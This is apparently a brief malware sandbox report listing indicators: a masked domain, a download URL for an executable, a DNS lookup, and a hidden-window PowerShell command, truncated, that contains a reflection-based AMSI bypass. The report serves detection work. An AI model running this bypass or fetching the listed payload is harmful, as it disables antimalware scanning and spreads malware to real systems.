Technical Information
- 'es##.com.eg':80
- http://es##.com.eg/thursswift/teslaswift.exe
- DNS ASK es##.com.eg
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -noprofile [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);If (test-path $env:APPDATA +...' (with hidden window)